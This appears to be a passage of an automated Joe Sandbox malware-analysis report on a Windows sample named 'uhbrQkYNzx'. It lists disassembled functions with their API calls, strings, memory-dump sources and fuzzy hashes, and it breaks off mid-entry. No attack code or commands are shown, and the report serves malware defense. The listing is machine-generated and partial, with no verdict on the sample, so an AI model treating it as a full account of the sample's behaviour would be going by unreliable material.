                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item
                                                              • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                              • API String ID: 3888421826-2634093826
                                                              • Opcode ID: e14eb9f574143db7025d464889ed8b94c38af4221216b74f3b783cda5df468c6
                                                              • Instruction ID: 65453f4c9bccc730fba4b2d76a940c0f0be877f52f215e70aafadbf38113a69a
                                                              • Opcode Fuzzy Hash: e14eb9f574143db7025d464889ed8b94c38af4221216b74f3b783cda5df468c6
                                                              • Instruction Fuzzy Hash: 3C817C31900259EEDF24EBE4C991BEDB7B8BF58320F54009AE506B7191EB705F89CB61
                                                              Function 009ADC95 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$H_prolog3
                                                              • String ID: &nbsp;$<br>
                                                              • API String ID: 1035939448-26742755
                                                              • Opcode ID: 1943c9867c88ea8f3363b2ab21fa32077815502d618b1074a5268760e2965880
                                                              • Instruction ID: aaeee323e167f15d00af69f25431ef6c111a20cf9ab53f46d0a169cecd726216
                                                              • Opcode Fuzzy Hash: 1943c9867c88ea8f3363b2ab21fa32077815502d618b1074a5268760e2965880
                                                              • Instruction Fuzzy Hash: 8B412A30B022159BDB259F54C981B3D7736FF96714F60842EE4079BAC1EBB19A82CBD1
                                                              Function 009B07E5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 009B07F5
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 009B081A
                                                              • DeleteObject.GDI32(00000000), ref: 009B084C
                                                              • DeleteObject.GDI32(00000000), ref: 009B086F
                                                                • Part of subcall function 009AEBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,009B0845,00000066), ref: 009AEBE6
                                                                • Part of subcall function 009AEBD3: SizeofResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEBFD
                                                                • Part of subcall function 009AEBD3: LoadResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEC14
                                                                • Part of subcall function 009AEBD3: LockResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEC23
                                                                • Part of subcall function 009AEBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,009B0845,00000066), ref: 009AEC3E
                                                                • Part of subcall function 009AEBD3: GlobalLock.KERNEL32(00000000), ref: 009AEC4F
                                                                • Part of subcall function 009AEBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 009AEC73
                                                                • Part of subcall function 009AEBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 009AECB8
                                                                • Part of subcall function 009AEBD3: GlobalUnlock.KERNEL32(00000000), ref: 009AECD7
                                                                • Part of subcall function 009AEBD3: GlobalFree.KERNEL32(00000000), ref: 009AECDE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                              • String ID: ]
                                                              • API String ID: 1797374341-3352871620
                                                              • Opcode ID: 5eef2298cf93a8f9886372283454ca14a7c0942c1fae756437a58ec7bb609dc9
                                                              • Instruction ID: 6bba30787aca87d181f1e026b8222897983a311a0580e655107f04721836f7c7
                                                              • Opcode Fuzzy Hash: 5eef2298cf93a8f9886372283454ca14a7c0942c1fae756437a58ec7bb609dc9
                                                              • Instruction Fuzzy Hash: 4601D232944215B7E71177A49D4ABBF7A7EEFC1B66F040024F900AB2D1DB728D0596E1
                                                              Function 009BED2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009BECE0,00000000,?,009BEC80,00000000,009D6F40,0000000C,009BEDD7,00000000,00000002), ref: 009BED4F
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009BED62
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,009BECE0,00000000,?,009BEC80,00000000,009D6F40,0000000C,009BEDD7,00000000,00000002), ref: 009BED85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: ab9ccdb24a3b0d2ca6075ba2e95847b2801c57e5c4aebfa7c065b4f27dd0e114
                                                              • Instruction ID: 34b32fb7a8aa5bd08da1ac9927c418543f30db8df24ef98b3be3ecf138276337
                                                              • Opcode Fuzzy Hash: ab9ccdb24a3b0d2ca6075ba2e95847b2801c57e5c4aebfa7c065b4f27dd0e114
                                                              • Instruction Fuzzy Hash: 3FF03175E15108FBCF159FA4DC59FDDBFB9EB44725F400169E809A2190CB708941DA50
                                                              Function 009A5094 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 009A6C5E: __EH_prolog3_GS.LIBCMT ref: 009A6C65
                                                                • Part of subcall function 009A6C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 009A6C9A
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009A50B3
                                                              • GetProcAddress.KERNEL32(009E51F8,CryptUnprotectMemory), ref: 009A50C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryH_prolog3_System
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 270589589-1753850145
                                                              • Opcode ID: cb0065f38ba5b6b16f7980fccbb86840c1d6aaa5ef9f2581a1e09c3f0fa694e4
                                                              • Instruction ID: 168d9809ed501d15569d344b8dc7ee283507be9fe72f9ed4429456fd42a90252
                                                              • Opcode Fuzzy Hash: cb0065f38ba5b6b16f7980fccbb86840c1d6aaa5ef9f2581a1e09c3f0fa694e4
                                                              • Instruction Fuzzy Hash: 02E04FB0D14711DECB309B74DC08F467ED89F45718F05882DE4DE93581D6B4E4808B91
                                                              Function 009B985A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: 5ec9e15f4eb8db58ff671426cd5cae9c35436b6608fa7acd1a22cdea095aa8b8
                                                              • Instruction ID: a6f227e386d2f272d90470205cd370204f020a56d0d934d596d7e402032545a7
                                                              • Opcode Fuzzy Hash: 5ec9e15f4eb8db58ff671426cd5cae9c35436b6608fa7acd1a22cdea095aa8b8
                                                              • Instruction Fuzzy Hash: E351F472A21206AFDB298F54CA41BFAB7A8FF80330F14452DEE4597291E735EC84C790
                                                              Function 0099F3BE Relevance: 7.7, APIs: 5, Instructions: 161filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099F3C5
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,0099B749,?,?,?,?,?,?), ref: 0099F450
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 0099F4A7
                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 0099F569
                                                              • CloseHandle.KERNEL32(?), ref: 0099F570
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CloseH_prolog3_HandleTime
                                                              • String ID:
                                                              • API String ID: 4002707884-0
                                                              • Opcode ID: 77b14ac0041314c3b43025946d7f71b02ed779a78d297dc20e8e3d35aa93d214
                                                              • Instruction ID: 106203d87bfa60318717eb5cb4a888337e38c167ce53c6cb658a79ad425a91b6
                                                              • Opcode Fuzzy Hash: 77b14ac0041314c3b43025946d7f71b02ed779a78d297dc20e8e3d35aa93d214
                                                              • Instruction Fuzzy Hash: 5651BE70E04249AAEF10DFE8D899BEEFBB9AF49310F240129F441F7280D7349A45CB25
                                                              Function 009C2BE0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 009C2BE9
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009C2C0C
                                                                • Part of subcall function 009C040E: RtlAllocateHeap.NTDLL(00000000,009B535E,?,?,009B6C16,?,?,?,?,?,009B5269,009B535E,?,?,?,?), ref: 009C0440
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009C2C32
                                                              • _free.LIBCMT ref: 009C2C45
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009C2C54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 4e69c4c899f228534b8b0a4b6d59aa1f03c227730b856768ee25a66d66ffe58e
                                                              • Instruction ID: 8a98bb08c0d591f814ffb7babcec49e3a7ef75e3786ba93204e399c58bab1651
                                                              • Opcode Fuzzy Hash: 4e69c4c899f228534b8b0a4b6d59aa1f03c227730b856768ee25a66d66ffe58e
                                                              • Instruction Fuzzy Hash: 2201F7B2E05210BF332527775C8CE7F7E6DDEC6B61318016CF948D2111DA60CC01A2B2
                                                              Function 009C0089 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(009B535E,009B535E,?,009C01D8,009C0451,?,?,009B6C16,?,?,?,?,?,009B5269,009B535E,?), ref: 009C008E
                                                              • _free.LIBCMT ref: 009C00C3
                                                              • _free.LIBCMT ref: 009C00EA
                                                              • SetLastError.KERNEL32(00000000,?,009B535E), ref: 009C00F7
                                                              • SetLastError.KERNEL32(00000000,?,009B535E), ref: 009C0100
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: c7982a5f66f5be1dfa5e4e658dc38a375327207b1d3feefab609111a700361b1
                                                              • Instruction ID: 0f5e7fbf6e9767242be64746fb9725457ddaf48f0bdc43d0ac8662c3c23803ce
                                                              • Opcode Fuzzy Hash: c7982a5f66f5be1dfa5e4e658dc38a375327207b1d3feefab609111a700361b1
                                                              • Instruction Fuzzy Hash: 4901F972E59700EB9722F7745D45F2B261EAFC1371F23002CF509A2192EE748C41E223
                                                              Function 009C34AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 009C34C7
                                                                • Part of subcall function 009C03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?), ref: 009C03EA
                                                                • Part of subcall function 009C03D4: GetLastError.KERNEL32(?,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?,?), ref: 009C03FC
                                                              • _free.LIBCMT ref: 009C34D9
                                                              • _free.LIBCMT ref: 009C34EB
                                                              • _free.LIBCMT ref: 009C34FD
                                                              • _free.LIBCMT ref: 009C350F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 3d74de1078747aa7f6502fd502ce0f5229169ba35b19dbe1e0511a05977b6959
                                                              • Instruction ID: fbeca5a02d49461dd563ec05b36c09244bc992db8c058ad5904bfbd523b5a9b1
                                                              • Opcode Fuzzy Hash: 3d74de1078747aa7f6502fd502ce0f5229169ba35b19dbe1e0511a05977b6959
                                                              • Instruction Fuzzy Hash: 51F0FF32929250E79724FB68F486F1677DDABC4710759880EF409E7911CB70FD808661
                                                              Function 009BF7C0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 009BF7DE
                                                                • Part of subcall function 009C03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?), ref: 009C03EA
                                                                • Part of subcall function 009C03D4: GetLastError.KERNEL32(?,?,009C3546,?,00000000,?,00000000,?,009C356D,?,00000007,?,?,009C396A,?,?), ref: 009C03FC
                                                              • _free.LIBCMT ref: 009BF7F0
                                                              • _free.LIBCMT ref: 009BF803
                                                              • _free.LIBCMT ref: 009BF814
                                                              • _free.LIBCMT ref: 009BF825
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 0e656401fff6d14e5e358bafb97341ce9c3fbe594e9eff978f3424f715a8e2c1
                                                              • Instruction ID: 11c749d7dfe71ae07224284b2a33a1ba57b57665006435397226008e19ee7f63
                                                              • Opcode Fuzzy Hash: 0e656401fff6d14e5e358bafb97341ce9c3fbe594e9eff978f3424f715a8e2c1
                                                              • Instruction Fuzzy Hash: A1F05475839390CBAB11BF24BD82A4477A5F775764702011FF0196A271CB721C41EB92
                                                              Function 009B2F8D Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 350COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 009B31A4
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: .lnk$0$lnk
                                                              • API String ID: 176396367-906397761
                                                              • Opcode ID: 7a2c5ec6610be85a44d57734237f5109c1affe113949f7529c89161bf26a12e5
                                                              • Instruction ID: 45384500470ed3828b97dbf80991d1e385fba50f2c04c4eeb0c4260f954e5e6c
                                                              • Opcode Fuzzy Hash: 7a2c5ec6610be85a44d57734237f5109c1affe113949f7529c89161bf26a12e5
                                                              • Instruction Fuzzy Hash: 33E13771D012599FDF24DBA8CD85BDDB7B8BF49310F4044AAE409A3191EB349B88CF61
                                                              Function 009B2B26 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 291COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 009B2B66
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                                • Part of subcall function 009A0BF3: _wcslen.LIBCMT ref: 009A0C03
                                                              • EndDialog.USER32(?,00000001), ref: 009B2EDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$DialogPathTemp
                                                              • String ID: $@set:user
                                                              • API String ID: 2172748170-1503366402
                                                              • Opcode ID: eccd1f02101ac6fd838b3e1d644c7eec668beb6bd707b03dcee72887d28b9179
                                                              • Instruction ID: 82c9fcf3d245fafcdad30ff7da93739e59c1fcd8794f75342b97dafe01ad036d
                                                              • Opcode Fuzzy Hash: eccd1f02101ac6fd838b3e1d644c7eec668beb6bd707b03dcee72887d28b9179
                                                              • Instruction Fuzzy Hash: D5C15930C052999EDF20EBA8CD85BEDBBB8AF55314F44009AE449B7192DB705F88CF61
                                                              Function 009B1F82 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 009A1309: __EH_prolog3.LIBCMT ref: 009A1310
                                                                • Part of subcall function 009A1309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,009A17FB,?,?,\\?\,1AC349C0,?,?,?,00000000,009CA279,000000FF), ref: 009A1319
                                                                • Part of subcall function 009A1AD1: __EH_prolog3_GS.LIBCMT ref: 009A1AD8
                                                                • Part of subcall function 0099F763: __EH_prolog3_GS.LIBCMT ref: 0099F76A
                                                                • Part of subcall function 0099F58B: __EH_prolog3_GS.LIBCMT ref: 0099F592
                                                                • Part of subcall function 0099F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,0099A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0099F5A8
                                                                • Part of subcall function 0099F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049), ref: 0099F5EB
                                                              • SHFileOperationW.SHELL32(?,?,?,?,00000000), ref: 009B2137
                                                              • MoveFileW.KERNEL32(?,?), ref: 009B22BE
                                                              • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 009B22D8
                                                                • Part of subcall function 009A14CC: __EH_prolog3_GS.LIBCMT ref: 009A14D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                                              • String ID: .tmp
                                                              • API String ID: 1688541384-2986845003
                                                              • Opcode ID: b907b6a43064e34f6a9d52f3a4394b80757043d249ca16986a0688897137286c
                                                              • Instruction ID: 92ecededbb00556afa66178e110c57d30d4011630c4389a117a9662bec410045
                                                              • Opcode Fuzzy Hash: b907b6a43064e34f6a9d52f3a4394b80757043d249ca16986a0688897137286c
                                                              • Instruction Fuzzy Hash: ECC1E071C002699ADF25DFA8CD84BDDBBB8BF49314F5041EAE449A3251DB349B89CF21
                                                              Function 0099A300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099A307
                                                              • GetLastError.KERNEL32(00000054,?,?,?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049), ref: 0099A427
                                                                • Part of subcall function 0099AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0099AC2E
                                                                • Part of subcall function 0099AC11: GetLastError.KERNEL32 ref: 0099AC72
                                                                • Part of subcall function 0099AC11: CloseHandle.KERNEL32(?), ref: 0099AC81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
